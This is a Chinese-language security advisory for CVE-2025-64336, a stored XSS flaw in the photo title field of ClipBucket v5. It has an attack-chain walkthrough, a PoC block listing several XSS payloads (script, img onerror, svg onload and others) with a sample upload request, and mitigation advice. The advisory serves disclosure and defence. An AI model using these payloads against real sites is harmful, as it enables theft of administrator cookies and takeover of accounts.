ClipBucket v5 照片管理功能存储型XSS漏洞 (CVE-2025-64336)

漏洞信息

漏洞编号

CVE-2025-64336

漏洞类型

存储型XSS

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

ClipBucket v5

漏洞概述

ClipBucket v5是一款开源视频分享平台。该平台在5.5.2-#146及以下版本中，照片管理功能存在存储型跨站脚本(XSS)漏洞。攻击者可以利用此漏洞，通过上传包含恶意JavaScript代码的照片标题，在管理员访问管理后台时执行任意JavaScript代码。攻击门槛较低，只需普通用户权限即可发起攻击。虽然该恶意载荷不会在普通用户面向的照片画廊或详情页面执行，但在管理员后台的“管理照片”部分会被不安全地渲染，从而导致管理员浏览器中执行恶意JavaScript代码。此漏洞可能允许攻击者窃取管理员会话cookie、劫持管理员账户或执行其他恶意操作。官方已在5.5.2-#147版本中修复此问题。

技术细节

该漏洞属于存储型XSS漏洞，存在于ClipBucket v5的照片上传功能模块中。漏洞的根本原因是在处理用户上传照片时，未对照片标题字段进行充分的输入验证和输出编码。当普通用户上传照片时，可以在Photo Title字段中注入HTML/JavaScript代码（如<script>alert('XSS')</script>），系统将该恶意内容直接存储到数据库中。在普通用户界面中，系统可能对该字段进行了适当的转义处理，因此恶意代码不会执行。然而，当管理员访问Admin → Manage Photos页面查看照片列表时，系统直接将该字段内容渲染到HTML页面中，而未进行安全编码，导致存储的JavaScript代码被执行。攻击者利用此漏洞可窃取管理员的认证凭证、修改后台配置或进一步渗透系统。修复措施包括：对所有用户输入进行严格的输入验证，以及在所有输出点使用适当的输出编码函数。

攻击链分析

STEP 1

步骤1

攻击者注册ClipBucket v5普通用户账户

STEP 2

步骤2

攻击者登录后访问照片上传功能页面

STEP 3

步骤3

攻击者上传任意照片，并在Photo Title字段中注入恶意JavaScript代码（如<img src=x onerror=alert(document.cookie)>）

STEP 4

步骤4

系统未对Photo Title进行安全验证和编码，直接将恶意内容存储到数据库

STEP 5

步骤5

普通用户访问照片画廊或详情页面时，由于前端进行了输出编码，恶意代码不会执行

STEP 6

步骤6

管理员登录后台访问Admin → Manage Photos页面时，系统从数据库读取照片标题并直接渲染到HTML页面

STEP 7

步骤7

恶意JavaScript代码在管理员浏览器中执行，攻击者成功窃取管理员Cookie或执行其他恶意操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2025-64336 PoC - Stored XSS in ClipBucket v5 Photo Title
// Author: Security Researcher
// Target: ClipBucket v5 <= 5.5.2-#146

// Step 1: Register a regular user account on the target ClipBucket instance
// Step 2: Navigate to the photo upload functionality
// Step 3: Upload a photo with a malicious title containing XSS payload

// Example XSS payloads for Photo Title field:
// 1. Basic alert payload:
// <script>alert(document.cookie)</script>

// 2. Image onerror payload (bypasses some filters):
// <img src=x onerror=alert(document.domain)>

// 3. SVG payload:
// <svg/onload=alert(document.cookie)>

// 4. Body onload payload:
// <body onload=alert('XSS')>

// 5. Event handler payload:
// <input onfocus=alert('XSS') autofocus>

// The malicious photo title will be stored in the database.
// When an administrator visits Admin → Manage Photos section,
// the stored JavaScript code will execute in the admin's browser.

// Example HTTP Request (conceptual):
/*
POST /upload/photo HTTP/1.1
Host: target.com
Content-Type: multipart/form-data
Cookie: [regular_user_session]

------WebKitFormBoundary
Content-Disposition: form-data; name="photo_title"

<img src=x onerror=alert(document.cookie)>
------WebKitFormBoundary
Content-Disposition: form-data; name="photo"; filename="malicious.jpg"
Content-Type: image/jpeg

[image data]
------WebKitFormBoundary--
*/

// After successful upload, the XSS payload is stored.
// The vulnerability triggers when admin accesses Manage Photos page.

影响范围

ClipBucket v5 <= 5.5.2-#146

防御指南

临时缓解措施

如果无法立即升级，可采取以下临时缓解措施：1) 禁用普通用户的上传照片功能；2) 在Web应用防火墙(WAF)层面添加XSS过滤规则；3) 限制非管理员用户访问Manage Photos相关API接口；4) 监控管理员后台的异常访问日志；5) 考虑使用HTML净化库对用户输入进行清理。